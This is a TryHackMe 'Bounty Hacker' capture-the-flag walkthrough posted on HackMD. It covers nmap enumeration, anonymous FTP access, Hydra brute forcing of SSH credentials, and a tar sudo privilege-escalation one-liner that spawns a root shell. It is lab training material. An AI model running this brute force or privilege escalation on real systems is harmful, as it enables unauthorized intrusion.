Try   HackMD

Bounty Hacker Walkthrough - Try Hack Me

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More β†’

You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they'd take you up on claims! Prove your status is more than just a few glasses at the bar. I sense bell peppers & beef in your future!

Task 1: Living up to the title.

Enumaration

Nmap

β”Œβ”€[r00t@parrot]─[~/THM]
└──╼ $sudo nmap -sC -sT -sV -A 10.10.7.209
[sudo] password for r00t: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-14 16:03 EAT
Nmap scan report for 10.10.7.209
Host is up (0.25s latency).
Not shown: 967 filtered tcp ports (no-response), 30 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.18.119.138
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
|   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_  256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Ubiquiti AirOS 5.5.9 (90%), Linux 5.0 - 5.4 (89%), Linux 2.6.32 - 3.13 (89%), Linux 3.3 (89%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Linux 3.7 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   277.97 ms 10.18.0.1
2   279.74 ms 10.10.7.209

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.68 seconds

We found three ports open that is port 21, 22 and 80.

For us to answer Who wrote the task list? We will have to connect to the system using FTP since it allows anonymous connections.

NB: FTP is used to transfer files in a network between the client and server

FTP Exploitation

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More β†’

As we can see, we have access to our FTP. We can try and see what file are here using ls.
Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More β†’

We see, there are two files. To get them in my machine, I will use get filename
Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More β†’

Now I can exit and read the files downloaded and try to answer the question Who wrote the task list?
Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More β†’

As we can see, the author is -lin

Next, we now answer the question What service can you bruteforce with the text file found?
Ans: SSH

Next, is to get the user password. We will use Hydra, to bruteforce the ssh creds and have the file locks.txt as our wordlist.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More β†’

Gaining User

We now have the user password, we can now ssh into the target.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More β†’

I have successfully connected to the target.

Now, I can have user.txt

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More β†’

Yaay we got user.

Privilege Escalation

We can check what service we can run as super user using sudo -l

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More β†’

Now as you can see, we have permission of tar as root.

After a little bit of research and googling, i found some exploit from gtfoibins on tar escalation

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Using the exploit as root, Boom! we get root

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More β†’

Now we can successfully get root.txt

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More β†’

Congratulantions , finally we solved the lab and thank you so much for your time, if you liked this writeup and you feel it’s helpful then please share it with your friends.
Happy hacking!

Last changed by 
 
Lord_r41d3n
Shikata Ga Nai
0
498

Read more

My first postmortem

2022–05–02, 6:00 AM EAT: Project release2022–05–02, 9:00 AM EAT: Begin project. First, head to check for error logs.2022–05–02, 9:20 AM EAT: Find that error logs are okay, head to /etc/default/Nginx to check the maximum number of file descriptors a process can have.2022–05–02, 9:35 AM EAT: Found the problem with the high amount of requests made, where our ULIMIT was way below the requests made.2022–05–02, 9:55 AM EAT: Puppet script running began to increase the limit.

Nov 12, 2023
HTB SECRET

ENUMARATION nmap scan β”Œβ”€[r00t@parrot]─[~/Downloads/htb/secret] └──╼ $sudo nmap -sT -sC -sV -A 10.10.11.120 [sudo] password for r00t: Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-18 10:50 EAT Nmap scan report for 10.10.11.120 Host is up (0.27s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION

Feb 13, 2023
Paper Walkthrough - HTB

In this machine on port 80 it's first leak the new vhost called office.paper! on responce header X-Backend-Server after that wordpress version is vernable through Unauthenticated View Private/Draft Posts and we got the hint already with nick comment using the vernability we check the draft message that leak to another vhost and register ourself to that and get the directory Path Traversal and get the .env secret and login through ssh and for Privilege escalation we run linpeas that lead us to CVE-2021-3560. Emumeration nmap ┌─[r00t@parrot]─[~/ctf/paper] └──╼ $sudo nmap -sV -sC -sT -A 10.10.11.143 [sudo] password for r00t: Sorry, try again. [sudo] password for r00t:

May 27, 2022
Pandora Walkthrough - Hack The

In this box, I got to learn about SNMP exploitation and sqlmap. Also we have to do priviledge escalation to gain root. Enumaration nmap ┌─[r00t@parrot]─[~/HTB/pandora] └──╼ $sudo nmap -sV -A -sT -sC 10.10.11.136 Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-15 10:04 EAT Nmap scan report for 10.10.11.136 Host is up (0.20s latency). Not shown: 997 closed tcp ports (conn-refused)

May 20, 2022
Read more from Lord_r41d3n
Published on HackMD